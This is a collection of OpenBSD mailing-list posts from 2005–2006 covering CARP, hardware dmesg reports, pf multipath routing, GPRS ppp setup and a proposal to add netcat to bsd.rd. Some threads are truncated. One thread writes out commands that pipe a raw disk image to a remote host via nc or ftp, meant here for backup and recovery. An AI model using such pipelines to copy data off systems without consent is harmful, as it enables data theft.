CARP / HSRP problem

[Pete]

I have a pair of 3.9 pf firewalls running CARP. I have two ethernet 
connections to my provider who is running Cisco HSRP. When they reload the 
active router or bounce the active interface, then the Ciscos can no longer 
see the CARP virtual interface until I cause a CARP failover by rebooting the 
active firewall or admining down the external interface on the active 
firewall.

Through all of this, I have outbound connectivity from the firewall since it 
is on the same subnet as the Ciscos.

I am not sure if anyone else has experienced this, but I am sure Cisco won't 
fix it.

Thanks in advance for your help.


Scud

Re: smtpd + dkimsign 7.0 upgraded to 7.1

[Pete]

Hi,

you're probably missing something along those lines:

pki mail.example.com cert "/etc/ssl/mail.example.com.crt"
pki mail.example.com key "/etc/ssl/private/mail.example.com.key"

listen on egress tls pki mail.example.com

Re: 3.8 beta requests / test result on HP DL360

[Pete Vickers]

On 23 Aug 2005, at 01:33, Theo de Raadt wrote:


We are heading towards making the real 3.8 release soonish.  I would
like to ask the community to do lots of testing over the next week if
they can.



For info, here is the latest 3.8 i386 snapshot booting on a 'common  
corporate workhorse' HP DL360,  w/ 3GB RAM & 2xCPU and single RAID1  
logical disk.


Notes:
1.  micky's new ciss raid driver work very well, although spits a few  
"ciss0: cmd_stat 2 scsi_stat 0x0" from time to time.
2. The second NIC (bge1) fails to be attached on a single processor  
kernel. Anyone got any suggestions for BIOS/boot tweaks to get this  
working ?
3. if bsd.mp is booted then it drops into ddb> trying to attach bge1.   
I can try for a com port ps & trace if requested.
4. as mentioned in theo's mail 09-09-2005, bioctl supports only ami so  
far - I wonder if  ciss support is likely ? a documentation issue I  
suspect.

5. dmesg below:

OpenBSD 3.8 (GENERIC) #137: Thu Sep  1 17:41:20 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 2.80GHz ("GenuineIntel" 686-class) 2.80 GHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,CNXT-ID

real mem  = 3220783104 (3145296K)
avail mem = 2931396608 (2862692K)
using 4278 buffers containing 161140736 bytes (157364K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 12/31/99, BIOS32 rev. 0 @  
0xf

pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
pcibios0: PCI BIOS has 7 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:15:0 ("ServerWorks CSB5  
SouthBridge" rev 0x00)

pcibios0: PCI bus #0 is the last bus
bios0: ROM list: 0xc/0x8000 0xc8000/0x4000 0xee000/0x2000!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "ServerWorks CNB20-HE" rev 0x31
pchb1 at pci0 dev 0 function 1 "ServerWorks CNB20-HE" rev 0x00
pchb2 at pci0 dev 0 function 2 "ServerWorks CNB20-HE" rev 0x00
pci1 at pchb2 bus 1
bge0 at pci1 dev 2 function 0 "Broadcom BCM5703X" rev 0x02, BCM5703 A2  
(0x1002): irq 11 address 00:0b:cd:4e:4a:3a

brgphy0 at bge0 phy 1: BCM5703 10/100/1000baseT PHY, rev. 2
vga1 at pci0 dev 3 function 0 "ATI Rage XL" rev 0x27
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
ciss0 at pci0 dev 4 function 0 "Compaq Smart Array 5i/532 rev.2" rev  
0x01: irq 3

ciss0: 1 LD HW rev 1 FW 2.36/2.36
lmap 4000:0 scsibus0 at ciss0: 1 targets
sd0 at scsibus0 targ 0 lun 0:  SCSI0  
0/direct fixed

ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
sd0: 34727MB, 34727 cyl, 64 head, 32 sec, 512 bytes/sec, 71122560 sec  
total
vendor "Compaq", unknown product 0xb203 (class system subclass  
miscellaneous, rev 0x01) at pci0 dev 5 function 0 not configured
vendor "Compaq", unknown product 0xb204 (class system subclass  
miscellaneous, rev 0x01) at pci0 dev 5 function 2 not configured

pcib0 at pci0 dev 15 function 0 "ServerWorks CSB5 SouthBridge" rev 0x93
pciide0 at pci0 dev 15 function 1 "ServerWorks CSB5 IDE" rev 0x93: DMA
atapiscsi0 at pciide0 channel 0 drive 0
scsibus1 at atapiscsi0: 2 targets
cd0 at scsibus1 targ 0 lun 0:  SCSI0  
5/cdrom removable

cd0(pciide0:0:0): using PIO mode 4
ohci0 at pci0 dev 15 function 2 "ServerWorks OSB4/CSB5 USB" rev 0x05:  
irq 10, version 1.0, legacy support

usb0 at ohci0: USB revision 1.0
uhub0 at usb0
uhub0: ServerWorks OHCI root hub, rev 1.00/1.00, addr 1
uhub0: 4 ports with 4 removable, self powered
pchb3 at pci0 dev 15 function 3 "ServerWorks CSB5 PCI" rev 0x00
pchb4 at pci0 dev 17 function 0 "ServerWorks CIOBX2" rev 0x05
pchb5 at pci0 dev 17 function 2 "ServerWorks CIOBX2" rev 0x05
pci2 at pchb5 bus 4
bge1 at pci2 dev 2 function 0 "Broadcom BCM5703X" rev 0x02: couldn't  
establish interrupt at irq 15

isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
pcppi0 at isa0 port 0x61
midi0 at pcppi0: 
spkr0 at pcppi0
sysbeep0 at pcppi0
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask e7ed netmask efed ttymask ffef
pctr: user-level cycle counter enabled
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
dkcsum: sd0 matches BIOS drive 0x80
root on sd0a
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
rootdev=0x400 rrootdev=0xd00 rawdev=0xd02
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
#
#

Booting hangs at fxp detection (and crypto h/w)

[Pete Vickers]

Hi,

I'm having trouble booting an i386 box - it seems to hang at  
detecting the

fxp NICs (2 present, on motherboard, not possible to disable in BIOS).


If I enable verbose booting in UKC it hangs at:

...
>>>probing for pcic*
>>>pcic probe returned 0
>>>fxp probe won
fxp0 at pci0 dev 16 function 0 "Intel 82559ER" rev 0x09



below is the complete dmesg, with fxp disabled to get it complete.
Anyone any ideas on possible causes/workaround ?

Also the "vendor "Invertex", unknown product 0x0006 (class processor  
subclass

Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured"
should be a HiFn crypto card. Any ideas why this is not recognised ?

thanks,

/Pete


#dmesg


OpenBSD 3.8-current (GENERIC) #202: Wed Oct 19 17:52:24 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 449 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
real mem  = 536453120 (523880K)
avail mem = 482627584 (471316K)
using 4278 buffers containing 26927104 bytes (26296K) of memory
User Kernel Config
UKC> disable fxp
103 fxp* disabled
104 fxp* disabled
UKC> exit
Continuing...
mainbus0 (root)
bios0 at mainbus0: AT/286+(d9) BIOS, date 11/16/00, BIOS32 rev. 0 @  
0xfc960

pcibios0 at bios0: rev 2.1 @ 0xfc9d0/0x900
pcibios0: PCI BIOS has 11 Interrupt Routing table entries
pcibios0: PCI Exclusive IRQs: 3 4 5 7 9 10 11 12 14 15
pcibios0: PCI Interrupt Router at 000:07:0 ("Acer Labs M1533 ISA" rev  
0x00)

pcibios0: PCI bus #1 is the last bus
ipmi at mainbus0 not configured
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Acer Labs M1541 PCI" rev 0x04
ppb0 at pci0 dev 1 function 0 "Acer Labs M5243 AGP/PCI-PCI" rev 0x04
pci1 at ppb0 bus 1
ohci0 at pci0 dev 2 function 0 "Acer Labs M5237 USB" rev  
0x03pci_intr_map:

no mapping for pin A
: couldn't map interrupt
"Acer Labs M7101 Power" rev 0x00 at pci0 dev 3 function 0 not configured
pcib0 at pci0 dev 7 function 0 "Acer Labs M1533 ISA" rev 0xc3
vendor "Invertex", unknown product 0x0006 (class processor subclass
Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured
pciide0 at pci0 dev 15 function 0 "Acer Labs M5229 UDMA IDE" rev 0xc1:
DMA, channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 19092MB, 39102336 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
pciide0: channel 1 disabled (no drives)
"Intel 82559ER" rev 0x09 at pci0 dev 16 function 0 not configured
"Intel 82559ER" rev 0x09 at pci0 dev 18 function 0 not configured
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard
pcppi0 at isa0 port 0x61
midi0 at pcppi0: 
spkr0 at pcppi0
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pccom0: console
pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
biomask ff65 netmask ff65 ttymask ffe7
pctr: user-level cycle counter enabled
mtrr: K6-family MTRR support (2 registers)
dkcsum: wd0 matches BIOS drive 0x80
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
#

Q: why is OpenBSD's openssl build without -pthread ???

[Pete Vickers]

Hi,

Can anyone tell me why OpenBSD's openssl not build with -pthread ?

I'm evaluating 'pound'  SSL reverse proxy ( http://www.apsis.ch/ 
pound/ ), which seems to require  threaded SSL libs. The OpenBSD  
supplied openssl seems to have threads disabled, but if I retrieve &  
make a local copy with the -pthread complier option, it seems to  
build & run fine. I'm sure there's a good reason for it not being  
enabled by default - I'm just interested to know what is it...


thanks

/Pete

rapid response to ordering :-)

[Pete Vickers]

Hi,

Just to say thanks to all involved. I ordered my 3.8CDs on via  
OpenBSD/europe page on tuesday, and they arrived today (friday)... in  
Norway. All in tact and unblemished  (as usual).  Great service,  
thanks :-)


/Pete

Re: CDP with OpenBSD

[Pete Vickers]

Hi,

On 19. nov. 2005, at 18.58, [EMAIL PROTECTED] wrote:


Hi All,

I am searching for a Tool with which I can
do the Cisco Discovery Protocol (CDP) requests on


no such things as CDP requests. A host can merely transmit  
(broadcast) CDP info packets (by default every 60secs), and/or listen  
for them.




a OpenBSD. I searched in the ports and
packets but did not find any.
Does anyone know one?


I've used this before:

http://sourceforge.net/projects/scdp/

you need to tweak a couple of trivial 'all the world is x86' bugs, if  
all your world is not

I'll make a port if there's any demand.



After a Google search I found only a pen test tool.
http://yersinia.sourceforge.net/
Looks interesting.
I tried to install it on a OpenBSD 3.7 Stable.
I got
Libpcap (at least 0.8.x) library is needed in order to compile  
Yersinia!!...

I downloaded the http://www.tcpdump.org/release/libpcap-0.9.4.tar.gz
but I was not sure to which directory I should it install.
Any hints how to upgrade the libpcap libraries and to which directory
without getting any problems?

Thanks,
Stefan

additional features in bsd.rd

[Pete Vickers]

Hi Developers,

I have a suggestion regarding ramdisk / bsd.rd : I believe it (they)  
could be even more useful with the additional of the 'nc' utility on  
it's internal filesystem.


I added a line referencing /usr/bin/nc to (for example) /usr/src/ 
distrib/i386/common/list, and made a release(8). The resulting bsd.rd  
file was not significantly bigger (in my completely unqualified  
opinion). However I could then:


1. Get a dmesg output from CD-ROM booted bsd.rd  to my other machine  
for emailing etc.

# dmesg | nc 10.20.30.40 1234

2. Get information off a machine, either for backup purposes or data  
recovery etc.

# dd if=/dev/rwd0c | nc 10.20.30.40 1234

3. Restore a  'disk image' from above...
#  nc -l 1234 | dd of=/dev/rwd0c

( I keep a spare USB 802.11g ural http://www.gigabyte-usa.com/ 
Communication/Products/Products_Wireless_GN-WBKG.htm device and an  
official CD along with my laptop on customer visits, so this would be  
very convenient for me...)


If I've overlooked something, or if the size increase is infact  
significant (and breaks something else), then I appologies, otherwise  
I hope it's a valid & useful suggestion...


p.s. I'm aware that any such network transfers would be unencrypted,  
obviously depending on the sensitivity, an ethernet cross-over cable  
could be used. Just because I give you a gun doesn't mean to have to  
shoot yourself in the foot with it



/Pete

Re: additional features in bsd.rd

[Pete Vickers]

On 22. nov. 2005, at 12.42, Stuart Henderson wrote:


--On 22 November 2005 12:01 +0100, Pete Vickers wrote:


1. Get a dmesg output from CD-ROM booted bsd.rd  to my other machine
for emailing etc.
# dmesg | nc 10.20.30.40 1234

3. Restore a  'disk image' from above...
#  nc -l 1234 | dd of=/dev/rwd0c


You can already do those things with 'ftp -o -'..


unless I read ftp(1) incorrectly, then it supports retrieve only,  
with no ability to send - which was my main desire.





2. Get information off a machine, either for backup purposes or data
recovery etc.
# dd if=/dev/rwd0c | nc 10.20.30.40 1234


I'm not sure the ability to dd a raw image directly is worth the  
extra bytes (if you look at cvs log, you'll see that quite small  
savings are considered important - 16k is huge in comparison to  
some of these).




ability to get info / files / data _off_ the machine really. But I  
suspect you may be correct that 16k is too 'expensive'.



/Pete

Re: additional features in bsd.rd

[Pete Vickers]

On 23. nov. 2005, at 23.03, Chris Kuethe wrote:


On 23/11/05, Olivier Cherrier <[EMAIL PROTECTED]> wrote:

You can download and upload files using ftp(1).
I use to do it since OpenBSD 2.9, using standard floppies.



i think he wants to do something like

ftp -u /tmp/thingy ftp://myserver/pub/incoming/dmesg.txt
to upload /tmp/thingy to myserver, or

dd if=/dev/wd0c bs=256k | ftp -u - ftp://myserver/pub/incoming/ 
wd0c.img

to send a disk image someplace.

more than once i've built static copies of nc and brought them into
the ramdisk with ftp just so that i could send disk images out...


Yep, the point is that in lots of situations, you need to get info/ 
data on/off a machine 'running' bsd.rd, and nc is, in best unix  
tradition, a simple, efficient , and very convenient tool to do so.  
You don't even need the hassle of firing up ftpd and sorting accounts  
etc on another machine, nc will do there too.


Since there are already several different versions of restricted  
space 1.44MB floppy images (floppy/B/C), and also fuller featured CD  
fs, maybe nc could be added just to the CD version?



/Pete

Re: #define failure opportunity

[pete wright]

On 11/28/05, Qv6 <[EMAIL PROTECTED]> wrote:
> On Monday 28 November 2005 04:04 pm, Theo de Raadt wrote:
> > This is why OpenBSD/OpenSSH does not need to hire a spin doctor.
> >
> > Other people do it for us ;)
> >
> > http://www.ssh.com/company/newsroom/article/684/
> >
> > And... thanks to those of you who supported us when they were
> > threatening to sue us years ago..
>
>
> Intersting news.
>
> I once worked for a major Telecom firm that used a commercial
> implementation of ssh. I was curious and I asked one of the other
> techies why pay for ssh when openssh is available. "Because we can go
> to the company for support" was his answer.
>
> I couldn't help but wonder what type of issues people encounter while
> using openssh. Aside from the usuall software bugs, has there really
> been any major problems with openssh that the community has not fixed
> promptly?
>
>
Not that I don't think openssh is superior for the fact that it *is*
open software, I bet that the company in question needs software
support lisc. for legal issues.  If the software goes tit's up and
costs the company N dollar's it is easier to get that money from a
commercial entity whom you have a contract with (or more likely get
money via a insurance broker of some sort).  At least that's the best
I've been able to see through that line of reasoning :^)

-p


--
~~o0OO0o~~
Pete Wright
www.nycbug.org
NYC's *BSD User Group

Re: my multipath routing questions...

[Pete Vickers]

Hi,

Dunno if OBSD & your ISP supports it, but maybe try running multi- 
link ppp over the links, to 'bond' them into a single virtual  
interface which routing could point at...


Alternatively if you are hosting, presumably most of your trafffic is  
orginating 'inbound' from the 'net, and thus your ISP will decide  
which physical link to send the packets down - a route-to/reply-to on  
your end should just keep the ip 'conversation' on that pipe.


If most of your traffic is 'outbound' originated, (e.g. just users  
surfing all day long), then you could (and this is just an ugly hack  
to get you going), still use openbgp to announce your prefixes, but  
don't couple FIB with kernel table, and instead have a script  
periodically parse a 'bgpctl sh routes...or..suchlike' output, and  
then add 25% to each interface via 'route add w.x.y.z/nn via sanmm'.  
Obviously tweaks like polling i/f stats to measure individual  
utilisation and biase the number of prefixes sent to each, are possible.


Like I said, a hack, but might get you out of a tight spot...

what about multiple bgp sessions ?

/Pete


On 30. nov. 2005, at 07.26, andrew fresh wrote:


Hijacking this thread, cuZ now I am worried . . . .


On Mon, Nov 28, 2005 at 11:46:56PM -0800, David Ulevitch wrote:

I'd like to hear how people are using OpenOSPFd


I will prbly use OpenOSPFd in the future, but at the moment, my  
question

is about using OpenBGPd and multiple lines from the same provider.

I am getting 4 T1s from a single provider.  Issues with local telco
"facilities" for T3's and other things are causing me problems with
getting anything different.

I am going to end up with something like this:
san0-\
san1-\\ all connected to a single provider
san2-//
san3-/

Now, I assume I will have a single BGP session with them.  (I have  
very
little information for lines that are supposed to be installed  
tomorrow

morning at 9am).

Right now I have a cisco 3640 that has 2 T1's from AT&T and 2 from
Sprint, it has enough trouble with those which is why I want to  
replace

it with an OpenBSD box.  I am going to have an iBGP session with the
3640 and an eBGP session with my new provider.

I will be adding 20Mb over ethernet at some point in the fairly  
near future
(if they can ever get it installed) and will hopefully be getting  
rid of

the 3640 at that point.

The OpenBSD router will not be doing any NAT, it will be passing  
public IPs.



This is what has me worried:
On Tue, Nov 29, 2005 at 03:33:07PM +0100, Claudio Jeker wrote:

There is no kernel support for multipath routing.



I want to load balancing across those 4 T1s and it is sounding like I
will not be able to do that and will have to figure out how to get  
these

4 new lines into my old cisco router.

Unfortunately trunk(4) doesn't work with san interfaces :-( and  
that is
how it looked possible to do the bonding/inverse muxing that I was  
going

for.

$ ifconfig trunk0 trunkport san0 trunkport san1
ifconfig: SIOCSTRUNKPORT: Protocol not supported

It would be really kewl to use the trunk(4) interface for the BGP
peer address, since it now does failover, it would be up as long as  
any

individual lines were up.  It would be even kewler if it would be able
to change the weighting on that interface depending on the number of
lines in the trunk, but I guess I am dreaming again.

I guess I am looking for something like 'ip load-sharing per- 
packet' in

cisco terms.  But my real question is:  How do I get OpenBSD to treat
those 4 T1s as a single line and share the load across them?

or, how do I get a reasonable approximation from OpenBSD?


Also, with those 4 T1s, I want to make sure that in case any of the  
4 go down,
the BGP session will stay up.  With a cisco box, I just bind the  
session
to a loopback address, add routes for each interface and it will  
choose
one of the interfaces that is up to get to the destination.  How do  
I do

this with OpenBSD?

Will the BGP session just work when I solve the load balancing issue?

or do I have to do weird things with ifstated(8) (like 16 states  
for the

4 lines and lots of route add/delete statements)?

or something with 'route-to' in pf?
http://marc.theaimsgroup.com/?l=openbsd-misc&m=112831360613745&w=2

This seems to work in my test environment:
# t1s is an interface group containing all of the links to that  
provider

pass out on t1s route-to { \
(san0 10.35.0.2) \
(san1 10.35.1.2) \
(san2 10.35.2.2) \
(san3 10.35.3.2) \
} round-robin keep state
pass in  on san0 reply-to (san0 10.35.0.2) keep state
pass in  on san1 reply-to (san1 10.35.1.2) keep state
pass in  on san2 reply-to (san2 10.35.2.2) keep state
pass in  on san3 reply-to (san3 10.35.3.2) keep state


l8rZ,
--
andrew - ICQ# 253198 - JID: [EMAIL PROTECTED]
 Proud member: http://www.mad-techies.org

BOFH excuse of the day: telnet: Unable to connect to remote host:
Connection refused

Re: my multipath routing questions...

[Pete Vickers]

Hi,

On 30. nov. 2005, at 13.21, Claudio Jeker wrote:


On Wed, Nov 30, 2005 at 12:53:32PM +0100, Pete Vickers wrote:

Hi,

Dunno if OBSD & your ISP supports it, but maybe try running multi-
link ppp over the links, to 'bond' them into a single virtual
interface which routing could point at...



sppp(4) does not support multilink ppp.


shame...




Alternatively if you are hosting, presumably most of your trafffic is
orginating 'inbound' from the 'net, and thus your ISP will decide
which physical link to send the packets down - a route-to/reply-to on
your end should just keep the ip 'conversation' on that pipe.

If most of your traffic is 'outbound' originated, (e.g. just users
surfing all day long), then you could (and this is just an ugly hack
to get you going), still use openbgp to announce your prefixes, but
don't couple FIB with kernel table, and instead have a script
periodically parse a 'bgpctl sh routes...or..suchlike' output, and
then add 25% to each interface via 'route add w.x.y.z/nn via sanmm'.
Obviously tweaks like polling i/f stats to measure individual
utilisation and biase the number of prefixes sent to each, are  
possible.




Uhm. I think you switched the two. hosting has mostly outbound traffic
while end user cause inbound traffic.


no switch i believe. Although I agree hosting => mostly outbound  
traffic, the IP conversation is initialed from the remote party,  
_inbound_ . And therefore it's the ISP which decides which link to  
send the TCP SYN ( or whatever) down, and thus basic route-to packet  
directing would tie the entire conversation to that same line.






Like I said, a hack, but might get you out of a tight spot...

what about multiple bgp sessions ?



Wont help much unless you start some real evil filtering to balance  
the 4

t1 links.


/Pete


On 30. nov. 2005, at 07.26, andrew fresh wrote:


Hijacking this thread, cuZ now I am worried . . . .


On Mon, Nov 28, 2005 at 11:46:56PM -0800, David Ulevitch wrote:

I'd like to hear how people are using OpenOSPFd


I will prbly use OpenOSPFd in the future, but at the moment, my
question
is about using OpenBGPd and multiple lines from the same provider.

I am getting 4 T1s from a single provider.  Issues with local telco
"facilities" for T3's and other things are causing me problems with
getting anything different.

I am going to end up with something like this:
san0-\
san1-\\ all connected to a single provider
san2-//
san3-/

Now, I assume I will have a single BGP session with them.  (I have
very
little information for lines that are supposed to be installed
tomorrow
morning at 9am).

Right now I have a cisco 3640 that has 2 T1's from AT&T and 2 from
Sprint, it has enough trouble with those which is why I want to
replace
it with an OpenBSD box.  I am going to have an iBGP session with the
3640 and an eBGP session with my new provider.

I will be adding 20Mb over ethernet at some point in the fairly
near future
(if they can ever get it installed) and will hopefully be getting
rid of
the 3640 at that point.

The OpenBSD router will not be doing any NAT, it will be passing
public IPs.


This is what has me worried:
On Tue, Nov 29, 2005 at 03:33:07PM +0100, Claudio Jeker wrote:

There is no kernel support for multipath routing.



I want to load balancing across those 4 T1s and it is sounding  
like I

will not be able to do that and will have to figure out how to get
these
4 new lines into my old cisco router.

Unfortunately trunk(4) doesn't work with san interfaces :-( and
that is
how it looked possible to do the bonding/inverse muxing that I was
going
for.

$ ifconfig trunk0 trunkport san0 trunkport san1
ifconfig: SIOCSTRUNKPORT: Protocol not supported

It would be really kewl to use the trunk(4) interface for the BGP
peer address, since it now does failover, it would be up as long as
any
individual lines were up.  It would be even kewler if it would be  
able

to change the weighting on that interface depending on the number of
lines in the trunk, but I guess I am dreaming again.

I guess I am looking for something like 'ip load-sharing per-
packet' in
cisco terms.  But my real question is:  How do I get OpenBSD to  
treat

those 4 T1s as a single line and share the load across them?

or, how do I get a reasonable approximation from OpenBSD?


Also, with those 4 T1s, I want to make sure that in case any of the
4 go down,
the BGP session will stay up.  With a cisco box, I just bind the
session
to a loopback address, add routes for each interface and it will
choose
one of the interfaces that is up to get to the destination.  How do
I do
this with OpenBSD?

Will the BGP session just work when I solve the load balancing  
issue?


or do I have to do weird things with ifstated(8) (like 16 states
for the
4 lines and lots of route add/delete statements)?

or something with 'route-to' in 

Re: upgrade halted

[Pete Vickers]

if you can read /var/log/authlog, you are in wheel (unless you've  
changed perms on it). So just use scp to copy ksh to /usr/local/bin/ 
tcsh...


/Pete


On 19. apr. 2006, at 17.15, Jasper Bal wrote:


Nick Holland schreef:


and then log in (or have them disable PF or ...).  You can also  
look at
/var/log/authlog for clues as to why you can't log in as you wish  
now.


Nick.



Thanks Nick. Look what I found in authlog:

Apr 19 16:09:17 Speculum sshd[15678]: User jabal not allowed  
because shell /usr/local/bin/tcsh does not exist


This is probably stupid, but I removed the tcsh pkg. I did think  
about possible difficulties logging in without, but i didn't think  
long enough.


All my users use tcsh. Root uses csh. If I could only remember the  
password...


Jasper

Nokia D211 GPRS/WLAN pc-card

[Pete Vickers]

Hi,

I've just spent some time trying to get a Nokia D211 pc-card to  
function under OpenBSD (i386 / -current). It didn't meet with any  
success, so the main point of this email is to document what I tried  
for the archives/google. In the event anyone has had more success  
than me, please let me know.


The card overview is available here -  http://nokia.com/phones/ 
nokiad211/ and it essentially contains both a GPRS(GSM) radio and an  
802.11b radio. However whilst windows and linux driver are available  
for download, it is a dreaded binary blob, and thus virtually useless  
under OpenBSD unless documentation is forthcoming.


Since Nokia also have single function GPRS cards "Nokia Card Phone  
2.0" ( http://www.europe.nokia.com/cda1/0,4267,2522,00.html ), I  
tried tweaking /usr/src/sys/dev/pcmcia/pcmciadevs etc to get the  
driver to attach it as one of them. And whilst the driver appears to  
attach:


   pccom3 at pcmcia0 function 0 "Nokia, D211" port 0xa000/16:  
ns8250, no fifo


it is clearly different from a real Card Phone:

   pccom3 at pcmcia0 function 0 "Nokia Mobile Phones, Nokia Card  
Phone" port 0xa000/16: ns16550a, 16 byte fifo


and pointing 'tip' at it does not yield anything.


Nokia also produce a single function 802.11b card "C110" ( http:// 
www.europe.nokia.com/nokia/0,8764,2701,00.html ), so I also tried  
adding the D211's pcmcia details in /usr/src/sys/dev/pcmcia/ 
if_wi_pcmcia.c etc to get that driver to attach. Alais was also  
unsucessful, whilst the driver attached, the dmesg line indicated  
that the driver failed to retrieve a MAC address from the card, and  
no interface was created.




/Pete

Re: entering custom AT commands into ppp.conf

[Pete Vickers]

Hi,

Here's my configs, should give you some hints..

mobile phone is connected to 'COM1' at 57600baud, adding a system  
default route via the new ppp link, and automatically redialing  
immediately after link failure:


=/etc/ppp/peers/ISP
/dev/tty00
57600
defaultroute
debug
#kdebug 7
lock
user my_username
noauth
noccp
novj
noipdefault
persist
#demand
connect '/usr/sbin/chat -e -v -f /etc/ppp/peers/chat/ISP-gprs'
=

script to initialise modem, and dial ISP: (CFUN/CPIN... is to reset  
the phone, then enter the PIN code etc)

=/etc/ppp/peers/chat/ISP-gprs
REPORT "Starting chat script..."
ABORT ERROR
ABORT BUSY
ABORT 'NO CARRIER'
ABORT 'NO DIALTONE'
'' ATZ
OK AT+CFUN=1,1
OK \d\dAT+CPIN=1234
OK AT+CGDCONT=1
OK AT+CGDCONT=1,"IP","my.apn.name",,0,0
OK ATD*99***1#
CONNECT
=


your ISP username & password (see pap-secrets instead if applicable):
=/etc/ppp/peers/chap-secrets
#secrets for authentication using CHAP
# clientserver  secret  IP addresses
my_username  *   my_password*
=


create the i/f at boot time, and initiate connection:
=/etc/hostname.ppp0
up
!pppd call ISP
=


To debug:
- $ sudo ifconfig ppp0 create
- $ sudo pppd dial ISP
	- tail /var/log/daemon, /var/log/chat (after syslogd.conf  
uncommenting/restart) and /etc/ppp/connection-errors




Hope this is of use.

/Pete



On 8. jun. 2006, at 08.07, Marius Van Deventer - Umzimkulu wrote:


Hi all.

By asking this queston i admit that i have no idea how ppp.conf works.
For a normal modem i am able to configure it fine, but for this  
problem

i have to admit that i have no idea. I found some hits on google but
nothing specific.

I managed (finally) to get gprs working on OpenBSD using my Nokia  
6680.

Apart from some defalt route issues it works fine.

But...

I have to enter the init strings manually using minicom before i dial.

i enter:

ATZ

and then

AT+CGDCONT=1,"IP","internet"

then i exit minicom with no reset (ctrl-a q) and dial.


Obviously there HAS to be a way to include these in ppp.conf. All my
attempts have failed.

I'm sorry for the newbie-like question. Please direct answers to the
list and flames to my private address :-)

Cheers

Marius Van Deventer
Computer Technician

Bytes Technology Group : Systems Integration

Tel : +27 39 682 4202 | Fax : +27 39 682 4126 | Cell : +27 82 321 6491

Email : [EMAIL PROTECTED]
Web  : www.btgroup.co.za   | Press
Office : www.itweb.co.za/office/bytes
  | Licensing :
www.purelicensing.co.za 

Bytes Systems Integration (Pty) Ltd : Registration No: 1995/012031/07
A subsidiary of Bytes Technology Group SA (Pty) Ltd, In association  
with

KAGISO
P O Box 4004, Umhlanga, 4350 ,55 Island Circle, Riverhorse Valley,  
Nandi

Drive, South Africa.

E-mail Disclaimer: http://www.altron.co.za/email.asp Or phone: (+27)
(11) 205-7000

by Symantec Mail Security for the presence of any viruses.

**


0 <<<


[demime 1.01d removed an attachment of type application/x-pkcs7- 
signature which had a name of smime.p7s]

new hardware platform ?

[Pete Vickers]

Hi,

After contemplating for sometime between buying a Zaurus C3100 and a  
HPC jazjar/universal (aka Qtek 9000, i-mate, O2 XDA Exec, T-Mobile  
MDA IV etc), to satisify my requirement for mobile remote  
administration needs etc. I decided to go with the Jazjar, and try to  
live with MS windows mobile v5 (along with 3rd party SSH client etc),  
for the added benefit of integrated connectivity and phone etc.


An overview of the device can be found here:

http://www.gsmarena.com/qtek_9000-1264.php
http://www.qtek.nu/europe/products/9000/specifications.aspx

However, as could possibly have been predicted, Windows is driving me  
mad, with frequent crashes, reboots, and hanging etc.  But I really  
like the additional hardware features over the Zaurus, such as:


- better size for pocket
- built in wlan
- built-in bluetooth
- backlit keyboard
- built in 3G tranceiver
- built in mobile phone
- built in video-conferencing ( 2 x video cameras)

So what I'm wondering is if any developers would like to try porting  
OpenBSD to the Jazjar platform ? I appreciate that the Zaurus port  
already exists for this niche, and that sufficient documentation  
would almost certainly be problematic/impossible to aquire for the  
Jazjar, but I'm hoping someone would like to try ?


The biggest problem that I can see with the Jazjar is the lack of  
physical internal disk. (It has 64MB SDRAM, and 128MB flash ROM) but  
